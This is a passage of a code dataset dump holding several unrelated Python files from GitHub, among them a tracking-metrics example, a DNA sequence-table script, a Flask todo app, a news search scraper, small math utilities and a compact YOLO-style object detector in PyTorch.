For now assume that the distance matrix given to us.\n\n # 2 Matches, 1 False alarm\n acc.update(\n [1, 2], # Ground truth objects in this frame\n [1, 2, 3], # Detector hypotheses in this frame\n [[0.1, np.nan, 0.3], # Distances from object 1 to hypotheses 1, 2, 3\n [0.5, 0.2, 0.3]] # Distances from object 2 to hypotheses 1, 2,\n )\n print(acc.events)\n\n # 1 Match, 1 Miss\n df = acc.update(\n [1, 2],\n [1],\n [[0.2], [0.4]]\n )\n print(df)\n\n # 1 Match, 1 Switch\n df = acc.update(\n [1, 2],\n [1, 3],\n [[0.6, 0.2],\n [0.1, 0.6]]\n )\n print(df)\n\n # Compute metrics\n\n mh = mm.metrics.create()\n summary = mh.compute(acc, metrics=['num_frames', 'mota', 'motp'], name='acc')\n print(summary)\n\n summary = mh.compute_many(\n [acc, acc.events.loc[0:1]],\n metrics=['num_frames', 'mota', 'motp'],\n names=['full', 'part'])\n print(summary)\n\n strsummary = mm.io.render_summary(\n summary,\n formatters={'mota': '{:.2%}'.format},\n namemap={'mota': 'MOTA', 'motp': 'MOTP'}\n )\n print(strsummary)\n\n summary = mh.compute_many(\n [acc, acc.events.loc[0:1]],\n metrics=mm.metrics.motchallenge_metrics,\n names=['full', 'part'])\n strsummary = mm.io.render_summary(\n summary,\n formatters=mh.formatters,\n namemap=mm.io.motchallenge_metric_names\n )\n print(strsummary)\n","repo_name":"cheind/py-motmetrics","sub_path":"motmetrics/apps/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","stars":1269,"dataset":"github-code","pt":"32"} +{"seq_id":"27061021399","text":"import pandas as pd\r\nimport os\r\n\r\nfile = r'12_screen.csv'\r\nwith open(file, 'r') as f:\r\n data = pd.read_csv(f)\r\n\r\nfor i in data.index:\r\n box1 = data.at[i, 'Upstream Box']\r\n if str(data.at[i, 'up_seq_trio']) == 'nan':\r\n spacer = ''\r\n else:\r\n spacer = data.at[i, 'up_seq_trio']\r\n trio = data.at[i, 'DnaA-trio']\r\n\r\n all_seq = box1 + spacer + trio\r\n\r\n data.at[i, 'predicted sequence'] = all_seq\r\n\r\ndata.rename(\r\n columns={'predicted sequence': 'Predicted BUS sequences'}, inplace=True)\r\ndata.rename(columns={'Upstream Box': 'Upstream DnaA-box'}, inplace=True)\r\ndata.rename(\r\n columns={'seq_between_box': 'Sequence between two DnaA-boxes'}, inplace=True)\r\ndata.rename(columns={'Downstream Box': 'Downstream DnaA-box'}, inplace=True)\r\ndata.rename(columns={'trio score': 'The score of DnaA-trios'}, inplace=True)\r\ndata.rename(\r\n columns={'the number of trio': 'The number of DnaA-trios'}, inplace=True)\r\ndata.rename(\r\n columns={'box motif': 'The standard motif of DnaA-box'}, inplace=True)\r\ndata.rename(\r\n columns={'Upstream mismatch': 'The mismatch of upstream DnaA-box'}, inplace=True)\r\ndata.rename(columns={\r\n 'Downstream mismatch': 'The mismatch of downstream DnaA-box'}, inplace=True)\r\ndata.rename(\r\n columns={'GC-rich region': 'Gap region (previous GC-rich region)'}, inplace=True)\r\ndata.rename(\r\n columns={'coserved spacer len': 'The length of spacer'}, inplace=True)\r\n\r\n\r\ndata = data[['Accession Number', 'DoriC AC', 'Predicted BUS sequences', 'Upstream DnaA-box', 'Downstream DnaA-box', 'DnaA-trio', 'The score of DnaA-trios', 'The number of DnaA-trios',\r\n 'The standard motif of DnaA-box', 'The mismatch of upstream DnaA-box', 'The mismatch of downstream DnaA-box', 'Gap region (previous GC-rich region)', 'The length of 
spacer']]\r\n\r\nos.remove('1_search_standard_box_spacer_0_16_greedy.csv')\r\nos.remove('2_search_specific_box_spacer_0_16_greedy.csv')\r\nos.remove('3_search_Epsilonproteobacteria_box_spacer_0_16_greedy.csv')\r\nos.remove('4_concat_delete_repeat.csv')\r\nos.remove('5_box1_box2.csv')\r\nos.remove('6_search_upstream_box.csv')\r\nos.remove('7_adjust_box.csv')\r\nos.remove('8_calculate_spacer_len.csv')\r\nos.remove('9_adjust_box_mismatch.csv')\r\nos.remove('10_minmismatch_newspacer.csv')\r\nos.remove('11_score_trio.csv')\r\nos.remove('12_screen.csv')\r\n\r\n\r\ndata.to_csv('DnaA_trios.csv', index=False)\r\n","repo_name":"DongMeiJing/DnaA-trios","sub_path":"Search_DnaA_trios/14_connect_seq.py","file_name":"14_connect_seq.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8728195358","text":"from flask import Flask,render_template,request,url_for,redirect,jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nimport sys\n\nfrom sqlalchemy.orm import backref\n\napp=Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql:///db1'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS']=False\ndb=SQLAlchemy(app)\nmigrate=Migrate(app,db)\n\nclass Todo(db.Model):\n id = db.Column(db.Integer , primary_key=True)\n description = db.Column(db.String, nullable=False)\n completed = db.Column(db.Boolean, default=False)\n list_id = db.Column(db.Integer , db.ForeignKey('todo_list.id'),nullable=False)\n def __repr__(self):\n return f''\n\nclass TodoList(db.Model):\n id = db.Column(db.Integer , primary_key=True)\n name = db.Column(db.String, nullable=False)\n todos = db.relationship('Todo', backref='list')\n\n@app.route('/')\ndef index():\n return redirect(url_for('view_list',list_id=1))\n\n@app.route('/lists/')\ndef view_list(list_id):\n return render_template('index.html',\n todos=Todo.query.filter_by(list_id=list_id).order_by('id').all(),\n lists=TodoList.query.order_by('id').all(),\n current_list=TodoList.query.filter_by(id=list_id).order_by('id').first())\n\n@app.route('/lists//create', methods=['POST'])\ndef create_todo(list_id):\n error=False\n data={}\n try:\n desc=request.get_json()['description']\n item=Todo(description=desc,list_id=list_id)\n db.session.add(item)\n db.session.commit()\n data = jsonify({\n 'description': item.description\n })\n except:\n db.session.rollback()\n error=True\n print(sys.exc_info())\n finally:\n db.session.close()\n \n if not error:\n return data\n\n@app.route('/lists/create', methods=['POST'])\ndef create_list():\n error=False\n data={}\n try:\n n=request.get_json()['name']\n list=TodoList(name=n)\n db.session.add(list)\n db.session.commit()\n data = jsonify({\n 'name': list.name,\n 'id': list.id\n })\n except:\n db.session.rollback()\n error=True\n print(sys.exc_info())\n finally:\n db.session.close()\n \n if not error:\n return data\n\n@app.route('/todos//completed', methods=['POST'])\ndef edit_checked(todo_id):\n error=False\n data={}\n try:\n comp=request.get_json()['completed']\n todo_id=todo_id.split('-')[1]\n item=Todo.query.get(todo_id)\n item.completed=comp\n db.session.commit()\n data = jsonify({\n 'completed': item.completed\n })\n except:\n db.session.rollback()\n error=True\n print(sys.exc_info())\n finally:\n db.session.close()\n if not error:\n return data\n\n@app.route('/todos//delete', methods=['POST'])\ndef delete_item(todo_id):\n error=False\n data={}\n try:\n todo_id=todo_id.split('-')[1]\n 
Todo.query.filter_by(id=todo_id).delete()\n db.session.commit()\n data = jsonify({\n 'deleted': True\n })\n except:\n db.session.rollback()\n error=True\n print(sys.exc_info())\n finally:\n db.session.close()\n if not error:\n return data\n\nif __name__ == \"__main__\":\n app.run(port=5000, debug=True) #host='0.0.0.0' to make app available though the network","repo_name":"omarelsheekh/todoapp","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1482884616","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n'''\n@File : spider.py\n@Time : 2020/07/27 00:49:53\n@Author : Recluse Xu\n@Version : 1.0\n@Contact : 444640050@qq.com\n@Desc : 爬取今日头条搜索结果页信息\n'''\n\n# here put the import lib\nimport requests\nfrom requests.exceptions import RequestException\nimport time\nimport json\n\n\nclass Article(object):\n def __init__(self, title: str, url_toutiao: str, source: str, image_url: str, create_time: str, abstract: str, summary: str):\n self.title = title # 标题\n self.url_toutiao = url_toutiao # 文章链接\n self.source = source # 作者\n self.image_url = image_url # 封面图片url\n self.create_time = create_time # 创建时间\n self.abstract = abstract # 摘要\n self.summary = summary # 总结\n\n def to_dict(self):\n return {\n '标题': self.title,\n '文章链接': self.url_toutiao,\n 'source': self.source,\n '封面图片url': self.image_url,\n '创建时间': self.create_time,\n '摘要': self.abstract,\n '总结': self.summary,\n }\n\n\ndef get_page(keyword: str, offset: int):\n '''\n 获取信息\n '''\n url = 'https://www.toutiao.com/api/search/content/'\n params = {\n 'aid': 24,\n 'app_name': 'web_search',\n 'offset': offset,\n 'format': 'json',\n 'keyword': keyword,\n 'autoload': 'true',\n 'count': 20,\n 'en_qc': 1,\n 'cur_tab': 1,\n 'from': 'search_tab',\n 'pd': 'synthesis',\n }\n try:\n response = requests.get(url, params=params)\n time.sleep(2)\n return response.json()\n except RequestException as e:\n print(e)\n return None\n\n\ndef get_info(info: dict):\n '''\n 获取数据\n '''\n if info['count'] == 0:\n return [], False\n return [Article(\n title=i.get('title'),\n url_toutiao='https://www.toutiao.com/' + i.get('source_url'),\n source=i.get('source'),\n image_url=i.get('image_url'),\n create_time=i.get('datetime'),\n abstract=i.get('abstract'),\n summary=i.get('summary'),\n ) for i in filter(lambda x: x.get('abstract'), info['data'])], True\n\n\ndef crawl_toutiao_search(keyword: str, page: int):\n result = []\n for i in range(20, page*20+1, 20):\n print((i/20)-1, page)\n info_dict = get_page(keyword, i)\n info, have_next_page = get_info(info_dict)\n result.extend(info)\n if not have_next_page:\n break\n return result\n\n\nif __name__ == \"__main__\":\n data = crawl_toutiao_search('python', 10)\n with open('example/简单_今日头条搜索结果/result.json', 'w', encoding='utf-8')as f:\n for arti in data:\n f.write(json.dumps(arti.to_dict(), indent=2, ensure_ascii=False) + '\\n')\n","repo_name":"RecluseXU/learning_spider","sub_path":"example/1_入门_今日头条搜索结果/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"32"} +{"seq_id":"33801994621","text":"# Convert a decimal to a hex as a string \r\ndef decimalToHex(decimalValue):\r\n hex = \"\"\r\n \r\n while decimalValue != 0:\r\n hexValue = decimalValue % 16 \r\n hex = toHexChar(hexValue) + hex\r\n decimalValue = decimalValue // 16\r\n \r\n return hex\r\n \r\n# Convert an integer 
to a single hex digit in a character \r\ndef toHexChar(hexValue):\r\n if 0 <= hexValue <= 9:\r\n return chr(hexValue + ord('0'))\r\n else: # 10 <= hexValue <= 15\r\n return chr(hexValue - 10 + ord('A'))\r\n\r\ndef main():\r\n # Prompt the user to enter a decimal integer\r\n decimalValue = eval(input(\"Enter a decimal number: \"))\r\n\r\n print(\"The hex number for decimal\", \r\n decimalValue, \"is\", decimalToHex(decimalValue))\r\n \r\nmain() # Call the main function\r\n","repo_name":"EthanSeaver/Python-Projects","sub_path":"pybook/Decimal2HexConversion.py","file_name":"Decimal2HexConversion.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"32"} +{"seq_id":"16787970492","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport scipy\n\ndef PadeAproximation(x):\n return (x - 7 * x**3 / 60) / (1 + x*x / 20)\n\nsamples = np.linspace(-np.pi / 2, np.pi / 2, 1000)\nvalues1 = np.sin(samples)\nvalues2 = samples\nvalues3 = PadeAproximation(samples)\nvalues4 = abs(values1 - values2)\nvalues5 = abs(values1 - values3)\n\nfig, axs = plt.subplots(5)\nfig.suptitle('Ex 8a, SIN X, X, PADE(X), ERR(SIN X, X), ERR(SIN X, PADE(X))')\naxs[0].plot(samples, values1)\naxs[1].plot(samples, values2)\naxs[2].plot(samples, values3)\naxs[3].plot(samples, values4)\naxs[4].plot(samples, values5)\n\nfor ax in axs.flat:\n ax.set_xlabel('timp')\n ax.set_ylabel('eroare')\n\nplt.savefig('Ex8a.pdf', format='pdf')\n\nplt.show()\n\nvalues4 = np.log(abs(values1 - values2))\nvalues5 = np.log(abs(values1 - values3))\n\nfig, axs = plt.subplots(2)\nfig.suptitle('Ex 8b, Eroarea pe axa OY logaritimica')\naxs[0].plot(samples, values4)\naxs[1].plot(samples, values5)\n\nfor ax in axs.flat:\n ax.set_xlabel('timp')\n ax.set_ylabel('lg(eroare)')\n\nplt.savefig('Ex8b.pdf', format='pdf')\nplt.show()","repo_name":"dimi999/ProcesareSemnale","sub_path":"Lab2/lab2_ex8.py","file_name":"lab2_ex8.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19464803029","text":"# 开发于 python3,仅需要下面两个第三方依赖,训练的数据为 labelimg 标注型的数据。\n# 依赖 pytorch:(官网找安装方式)开发使用版本为 torch-1.4.0-cp36-cp36m-win_amd64.whl\n# 依赖 opencv: (pip install opencv-contrib-python==3.4.1.15)\n# 其实这里的 opencv 版本不重要,py3能用就行,只是个人喜欢这个版本,因为能用sift图像检测,稳。\n\n\nimport cv2\nimport numpy as np\nimport torch\n\nimport os\nimport math\nimport xml.dom.minidom\n\n# 读取voc格式文件\ndef read_voc_xml(file, islist=True):\n d = xml.dom.minidom.parse(file)\n v = d.getElementsByTagName('annotation')[0]\n f = v.getElementsByTagName('path')[0].firstChild.data\n if not os.path.isfile(f):\n # 如果读取 xml 内的图片文件地址失败,则会在 xml 地址寻对应名字的图片文件再试一次\n # 所以打标的图片文件应该尽量和 voc 格式的xml文件地址放在一起,增加便利\n imgname = os.path.split(f)[-1]\n xmlpath = os.path.split(file)[0]\n f = os.path.join(xmlpath, imgname)\n if not os.path.isfile(f):\n raise 'fail load img: {}'.format(f)\n size = v.getElementsByTagName('size')[0]\n npimg = cv2.imread(f)\n npimg = cv2.cvtColor(npimg, cv2.COLOR_BGR2RGB) # [y,x,c]\n npimg = cv2.resize(npimg, (416, 416))\n npimg_ = np.transpose(npimg, (2,1,0)) # [c,x,y]\n def readobj(obj):\n d = {}\n bbox = obj.getElementsByTagName('bndbox')[0]\n d['width'] = int(size.getElementsByTagName('width')[0].firstChild.data)\n d['height'] = int(size.getElementsByTagName('height')[0].firstChild.data)\n d['ratew'] = rw = d['width']/416\n d['rateh'] = rh = d['height']/416\n d['depth'] = int(size.getElementsByTagName('depth')[0].firstChild.data)\n 
d['cate'] = obj.getElementsByTagName('name')[0].firstChild.data\n d['xmin'] = int(bbox.getElementsByTagName('xmin')[0].firstChild.data)/rw\n d['ymin'] = int(bbox.getElementsByTagName('ymin')[0].firstChild.data)/rh\n d['xmax'] = int(bbox.getElementsByTagName('xmax')[0].firstChild.data)/rw\n d['ymax'] = int(bbox.getElementsByTagName('ymax')[0].firstChild.data)/rh\n d['w'] = d['xmax'] - d['xmin']\n d['h'] = d['ymax'] - d['ymin']\n d['rect'] = d['xmin'],d['ymin'],d['xmax'],d['ymax']\n d['centerx'] = (d['xmin'] + d['xmax'])/2.\n d['centery'] = (d['ymin'] + d['ymax'])/2.\n d['numpy'] = npimg_\n d['file'] = f\n return d\n if islist: r = [readobj(obj) for obj in v.getElementsByTagName('object')]\n else: r = readobj(v.getElementsByTagName('object')[0])\n return r\n\n# 生成 y_true 用于误差计算\ndef make_y_true(imginfo, S, anchors, class_types):\n def get_max_match_anchor_idx(anchors, bw, bh):\n ious = []\n for aw, ah in anchors:\n mi = min(aw,bw)*min(ah,bh)\n ma = max(aw,bw)*max(ah,bh)\n ious.append(mi/(aw*ah + bw*bh - mi))\n return ious.index(max(ious))\n cx = imginfo['centerx']\n cy = imginfo['centery']\n bw = imginfo['w']\n bh = imginfo['h']\n gap = int(416/S)\n ww = list(range(416))[::int(gap)]\n for wi in range(len(ww)):\n if ww[wi] > cx: \n break\n hh = list(range(416))[::int(gap)]\n for hi in range(len(hh)):\n if hh[hi] > cy: \n break\n wi, hi = wi - 1, hi - 1\n sx, sy = (cx-ww[wi])/gap, (cy-hh[hi])/gap # 用ceil左上角做坐标并进行归一化\n ceillen = (5+len(class_types))\n log = math.log\n z = torch.zeros((S, S, len(anchors)*ceillen))\n indx = get_max_match_anchor_idx(anchors, bw, bh)\n for i, (aw, ah) in enumerate(anchors):\n if i == indx:\n left = i*ceillen\n clz = [0.]*len(class_types)\n clz[class_types.get(imginfo['cate'])] = 1.\n v = torch.FloatTensor([sx, sy, log(bw/aw), log(bh/ah), 1.] 
+ clz)\n z[wi, hi, left:left+ceillen] = v\n return z\n\n# 将经过 backbone 的矩阵数据转换成坐标和分类名字\ndef parse_y_pred(ypred, anchors, class_types, islist=False, threshold=0.2, nms_threshold=0):\n ceillen = 5+len(class_types)\n sigmoid = lambda x:1/(1+math.exp(-x))\n infos = []\n for idx in range(len(anchors)):\n if USE_CUDA:\n a = ypred[:,:,:,4+idx*ceillen].cpu().detach().numpy()\n else:\n a = ypred[:,:,:,4+idx*ceillen].detach().numpy()\n for ii,i in enumerate(a[0]):\n for jj,j in enumerate(i):\n infos.append((ii,jj,idx,sigmoid(j)))\n infos = sorted(infos, key=lambda i:-i[3])\n def get_xyxy_clz_con(info):\n gap = 416/ypred.shape[1]\n x,y,idx,con = info\n gp = idx*ceillen\n contain = torch.sigmoid(ypred[0,x,y,gp+4])\n pred_xy = torch.sigmoid(ypred[0,x,y,gp+0:gp+2])\n pred_wh = ypred[0,x,y,gp+2:gp+4]\n pred_clz = ypred[0,x,y,gp+5:gp+5+len(class_types)]\n if USE_CUDA:\n pred_xy = pred_xy.cpu().detach().numpy()\n pred_wh = pred_wh.cpu().detach().numpy()\n pred_clz = pred_clz.cpu().detach().numpy()\n else:\n pred_xy = pred_xy.detach().numpy()\n pred_wh = pred_wh.detach().numpy()\n pred_clz = pred_clz.detach().numpy()\n exp = math.exp\n cx, cy = map(float, pred_xy)\n rx, ry = (cx + x)*gap, (cy + y)*gap\n rw, rh = map(float, pred_wh)\n rw, rh = exp(rw)*anchors[idx][0], exp(rh)*anchors[idx][1]\n clz_ = list(map(float, pred_clz))\n xx = rx - rw/2\n _x = rx + rw/2\n yy = ry - rh/2\n _y = ry + rh/2\n np.set_printoptions(precision=2, linewidth=200, suppress=True)\n if USE_CUDA:\n log_cons = torch.sigmoid(ypred[:,:,:,gp+4]).cpu().detach().numpy()\n else:\n log_cons = torch.sigmoid(ypred[:,:,:,gp+4]).detach().numpy()\n log_cons = np.transpose(log_cons, (0, 2, 1))\n for key in class_types:\n if clz_.index(max(clz_)) == class_types[key]:\n clz = key\n break\n return [xx, yy, _x, _y], clz, con, log_cons\n def nms(infos):\n if not infos: return infos\n def iou(xyxyA,xyxyB):\n ax1,ay1,ax2,ay2 = xyxyA\n bx1,by1,bx2,by2 = xyxyB\n minx, miny = max(ax1,bx1), max(ay1, by1)\n maxx, maxy = min(ax2,bx2), min(ay2, by2)\n intw, inth = max(maxx-minx, 0), max(maxy-miny, 0)\n areaA = (ax2-ax1)*(ay2-ay1)\n areaB = (bx2-bx1)*(by2-by1)\n areaI = intw*inth\n return areaI/(areaA+areaB-areaI)\n rets = []\n infos = infos[::-1]\n while infos:\n curr = infos.pop()\n if rets and any([iou(r[0], curr[0]) > nms_threshold for r in rets]):\n continue\n rets.append(curr)\n return rets\n if islist:\n v = [get_xyxy_clz_con(i) for i in infos if i[3] > threshold]\n if nms_threshold:\n return nms(v)\n else:\n return v\n else:\n return get_xyxy_clz_con(infos[0])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.data as Data\nfrom torch.autograd import Variable\nfrom collections import OrderedDict\n\nUSE_CUDA = True if torch.cuda.is_available() else False\nDEVICE = 'cuda' if USE_CUDA else 'cpu'\ntorch.set_printoptions(precision=2, sci_mode=False, linewidth=120, profile='full')\n\nclass Mini(nn.Module):\n class ConvBN(nn.Module):\n def __init__(self, cin, cout, kernel_size=3, stride=1, padding=None):\n super().__init__()\n padding = (kernel_size - 1) // 2 if not padding else padding\n self.conv = nn.Conv2d(cin, cout, kernel_size, stride, padding, bias=False)\n self.bn = nn.BatchNorm2d(cout, momentum=0.01)\n self.relu = nn.LeakyReLU(0.1, inplace=True)\n def forward(self, x): \n return self.relu(self.bn(self.conv(x)))\n def __init__(self, anchors, class_types, inchennel=3):\n super().__init__()\n self.oceil = len(anchors)*(5+len(class_types))\n self.model = nn.Sequential(\n 
OrderedDict([\n ('ConvBN_0', self.ConvBN(inchennel, 32)),\n ('Pool_0', nn.MaxPool2d(2, 2)),\n ('ConvBN_1', self.ConvBN(32, 48)),\n ('Pool_1', nn.MaxPool2d(2, 2)),\n ('ConvBN_2', self.ConvBN(48, 64)),\n ('Pool_2', nn.MaxPool2d(2, 2)),\n ('ConvBN_3', self.ConvBN(64, 80)),\n ('Pool_3', nn.MaxPool2d(2, 2)),\n ('ConvBN_4', self.ConvBN(80, 96)),\n ('Pool_4', nn.MaxPool2d(2, 2)),\n ('ConvBN_5', self.ConvBN(96, 102)),\n ('ConvEND', nn.Conv2d(102, self.oceil, 1)),\n ])\n )\n def forward(self, x):\n return self.model(x).permute(0,2,3,1)\n\nclass yoloLoss(nn.Module):\n def __init__(self, S, anchors, class_types):\n super(yoloLoss,self).__init__()\n self.S = S\n self.B = len(anchors)\n self.clazlen = len(class_types)\n self.ceillen = (5+self.clazlen)\n self.anchors = torch.FloatTensor(anchors).to(DEVICE)\n\n def get_iou(self,box_pred,box_targ,anchor_idx):\n rate = 416/self.S\n pre_xy = box_pred[...,:2] * rate\n pre_wh_half = torch.exp(box_pred[...,2:4])*self.anchors[anchor_idx]/2\n pre_mins = pre_xy - pre_wh_half\n pre_maxs = pre_xy + pre_wh_half\n true_xy = box_targ[...,:2] * rate\n true_wh_half = torch.exp(box_targ[...,2:4])*self.anchors[anchor_idx]/2\n true_mins = true_xy - true_wh_half\n true_maxs = true_xy + true_wh_half\n\n inter_mins = torch.max(true_mins, pre_mins)\n inter_maxs = torch.min(true_maxs, pre_maxs)\n inter_wh = torch.max(inter_maxs - inter_mins, torch.FloatTensor([0.]).to(DEVICE))\n inter_area = inter_wh[...,0] * inter_wh[...,1]\n ture_area = torch.exp(box_pred[...,2])*self.anchors[anchor_idx][0] * torch.exp(box_pred[...,3])*self.anchors[anchor_idx][1]\n pred_area = torch.exp(box_targ[...,2])*self.anchors[anchor_idx][0] * torch.exp(box_targ[...,3])*self.anchors[anchor_idx][1]\n ious = inter_area/(ture_area+pred_area-inter_area)\n return ious\n\n def forward(self,predict_tensor,target_tensor,callback=None):\n N = predict_tensor.size()[0]\n box_contain_loss = 0\n noo_contain_loss = 0\n locxy_loss = 0\n locwh_loss = 0\n loc_loss = 0\n class_loss = 0\n for idx in range(self.B):\n targ_tensor = target_tensor [:,:,:,idx*self.ceillen:(idx+1)*self.ceillen]\n pred_tensor = predict_tensor[:,:,:,idx*self.ceillen:(idx+1)*self.ceillen]\n coo_mask = (targ_tensor[:,:,:,4] > 0).unsqueeze(-1).expand_as(targ_tensor)\n noo_mask = (targ_tensor[:,:,:,4] == 0).unsqueeze(-1).expand_as(targ_tensor)\n if not torch.any(coo_mask): \n noo_pred = pred_tensor[noo_mask].view(-1,self.ceillen)\n noo_targ = targ_tensor[noo_mask].view(-1,self.ceillen)\n noo_contain_loss += F.mse_loss(torch.sigmoid(noo_pred[...,4]), noo_targ[...,4],reduction='sum')*.1\n else:\n coo_pred = pred_tensor[coo_mask].view(-1,self.ceillen)\n coo_targ = targ_tensor[coo_mask].view(-1,self.ceillen)\n noo_pred = pred_tensor[noo_mask].view(-1,self.ceillen)\n noo_targ = targ_tensor[noo_mask].view(-1,self.ceillen)\n\n box_pred = coo_pred[...,0:5].contiguous().view(-1,5)\n box_targ = coo_targ[...,0:5].contiguous().view(-1,5)\n class_pred = coo_pred[...,5:5+self.clazlen]\n class_targ = coo_targ[...,5:5+self.clazlen]\n\n box_pred[...,:2] = torch.sigmoid(box_pred[...,:2])\n ious = self.get_iou(box_pred,box_targ,idx)\n box_contain_loss += F.mse_loss(torch.sigmoid(box_pred[...,4])*ious, box_targ[...,4],reduction='sum')\n noo_contain_loss += F.mse_loss(torch.sigmoid(noo_pred[...,4]), noo_targ[...,4],reduction='sum')*.1\n locxy_loss += F.mse_loss(box_pred[...,0:2], box_targ[...,0:2],reduction='sum')\n locwh_loss += F.mse_loss(box_pred[...,2:4], box_targ[...,2:4],reduction='sum')\n loc_loss += locxy_loss + locwh_loss\n class_loss += 
F.mse_loss(class_pred,class_targ,reduction='sum')\n # print('[ ious ] :', ious)\n all_loss = (box_contain_loss + noo_contain_loss + loc_loss + class_loss)/N/self.B\n global print\n print = callback if callback else print\n print(\n '[ loss ] (con|non){:>.3f}|{:>.3f},(xy|wh){:>.3f}|{:>.3f},(class){:>.3f},(all){:>.3f}.'.format(\n box_contain_loss.item(), noo_contain_loss.item(), locxy_loss.item(),\n locwh_loss.item(), class_loss.item(), all_loss.item(),\n )\n )\n return all_loss\n\ndef train(train_data, anchors, class_types):\n EPOCH = 1000\n BATCH_SIZE = 4\n LR = 0.001\n train_loader = Data.DataLoader(\n dataset = train_data,\n batch_size = BATCH_SIZE,\n shuffle = True,\n )\n try:\n state = torch.load('net.pkl')\n net = Mini(anchors, class_types)\n net.load_state_dict(state['net'])\n net.to(DEVICE)\n optimizer = state['optimizer']\n epoch = state['epoch']\n print('load train.')\n except:\n import traceback\n excp = traceback.format_exc()\n if 'FileNotFoundError' not in excp:\n print(traceback.format_exc())\n net = Mini(anchors, class_types)\n net.to(DEVICE)\n optimizer = torch.optim.Adam(net.parameters(), lr=LR)\n epoch = 0\n print('new train.')\n yloss = yoloLoss(13, anchors=anchors, class_types=class_types, )\n net.train()\n for epoch in range(epoch, epoch+EPOCH):\n print('epoch', epoch)\n for step, (x_true_, y_true_) in enumerate(train_loader):\n print('[{:<3}]'.format(step), end='')\n x_true = Variable(x_true_).to(DEVICE)\n y_true = Variable(y_true_).to(DEVICE)\n output = net(x_true)\n loss = yloss(output, y_true)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n state = {'net':net.state_dict(), 'optimizer':optimizer, 'epoch':epoch+1, \n 'anchors':anchors, 'class_types':class_types}\n torch.save(state, 'net.pkl')\n print('save.')\n print('end.')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ndef drawrect(img, rect, text):\n cv2.rectangle(img, tuple(rect[:2]), tuple(rect[2:]), (10,250,10), 2, 1)\n x, y = rect[:2]\n def cv2ImgAddText(img, text, left, top, textColor=(0, 255, 0), textSize=20):\n from PIL import Image, ImageDraw, ImageFont\n img = Image.fromarray(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n draw = ImageDraw.Draw(img)\n fontText = ImageFont.truetype( \"font/simsun.ttc\", textSize, encoding=\"utf-8\")\n draw.text((left, top), text, textColor, font=fontText)\n return cv2.cvtColor(np.asarray(img), cv2.COLOR_RGB2BGR)\n import re\n if re.findall('[\\u4e00-\\u9fa5]', text):\n img = cv2ImgAddText(img, text, x, y-12, (10,10,250), 12) # 如果存在中文则使用这种方式绘制文字\n else:\n cv2.putText(img, text, (x,y), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (10,10,250), 1)\n return img\ndef get_all_draw_rects(filename, state):\n net = state['net']\n anchors = state['anchors']\n class_types = state['class_types']\n npimg = cv2.imread(filename)\n height, width = npimg.shape[:2]\n npimg = cv2.cvtColor(npimg, cv2.COLOR_BGR2RGB) # [y,x,c]\n npimg = cv2.resize(npimg, (416, 416))\n npimg_ = np.transpose(npimg, (2,1,0)) # [c,x,y]\n y_pred = net(torch.FloatTensor(npimg_).unsqueeze(0).to(DEVICE))\n v = parse_y_pred(y_pred, anchors, class_types, islist=True, threshold=0.2, nms_threshold=0.4)\n r = []\n for i in v:\n rect, clz, con, log_cons = i\n rw, rh = width/416, height/416\n rect[0],rect[2] = int(rect[0]*rw),int(rect[2]*rw)\n rect[1],rect[3] = int(rect[1]*rh),int(rect[3]*rh)\n r.append([rect, clz, con, log_cons])\n # 绘制所有定位的框\n img = cv2.imread(filename)\n for i in r:\n rect, clz, con, log_cons = i\n img = drawrect(img, rect, '{}|{:<.2f}'.format(clz,con))\n cv2.imshow('test', img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\ndef 
load_net(filename):\n state = torch.load(filename)\n anchors = state['anchors']\n class_types = state['class_types']\n net = Mini(anchors, class_types)\n net.load_state_dict(state['net'])\n net.to(DEVICE)\n net.eval()\n state['net'] = net\n return state\n\n\n\n\n\n\n\ndef load_voc_data(xmlpath, anchors):\n files = [os.path.join(xmlpath, path) for path in os.listdir(xmlpath) if path.endswith('.xml')]\n imginfos = []\n print('use anchors:', anchors)\n print('load xml file number:{}, start.'.format(len(files)))\n for idx, file in enumerate(files):\n if idx % 1000 == 0: print('loading {}/{}'.format(idx, len(files)))\n imginfos.extend(read_voc_xml(file, islist=True))\n print('load all file. ok.')\n # 注意这里加载数据的方式是小批量加载处理,所以自动生成 class_types\n # 如果有大量数据想要进行多批次训练,那么就需要注意 class_types 的生成。\n class_types = [imginfo.get('cate') for imginfo in imginfos]\n print('load class types. start.')\n class_types = {typ:idx for idx,typ in enumerate(sorted(list(set(class_types))))}\n print('load class types. ok.')\n print('class_types:', class_types)\n train_data = []\n print('make x_true,y_true. start.')\n for idx, imginfo in enumerate(imginfos):\n if idx % 1000 == 0: print('makeing x_true,y_true. {}/{}'.format(idx, len(files)))\n x_true = torch.FloatTensor(imginfo['numpy'])\n y_true = make_y_true(imginfo, 13, anchors, class_types)\n train_data.append([x_true, y_true])\n print('make x_true,y_true. ok.')\n return train_data, imginfos, class_types\n\n\n\n\n\n\n\n\n\n\n\n# 加载数据,生成训练数据的结构,主要需要的三个数据 anchors,class_types,train_data\n# 